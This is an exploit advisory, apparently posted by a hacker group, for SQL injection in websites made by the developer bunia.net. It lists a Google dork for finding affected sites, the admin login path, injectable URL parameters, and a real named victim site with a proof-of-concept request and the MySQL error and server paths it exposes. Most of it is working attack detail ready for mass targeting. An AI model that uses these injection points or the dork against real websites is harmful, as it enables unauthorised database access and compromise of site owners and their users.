#################################################################################################
# Exploit Title : Dev by bunia.net Web Development SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 05/10/2018
# Vendor Homepage : bunia.net
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork : intext:''Dev by bunia.net''
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Admin Panel Login Path :
/cl-login.php
# SQL Injection Exploit :
/index.php?page=[SQL Injection]
/index.php?page=[ID-Number]&p=[SQL Injection]
/contact.php?id=[SQL Injection]
#################################################################################################
# Example Vulnerable Site =>
japdrive.com/index.php?page=3%27 => [ Proof of Concept ] => archive.is/mPCF5
# SQL Database Error =>
You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near ''1''' at line 1
Notice: Use of undefined constant submit - assumed 'submit' in /home/japdrive/public_html/
modules/module-initialize.php on line 144
Notice: Use of undefined constant page - assumed 'page' in /home/japdrive/public_html/
admin/cp-includes/inc-functions2.php on line 16
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################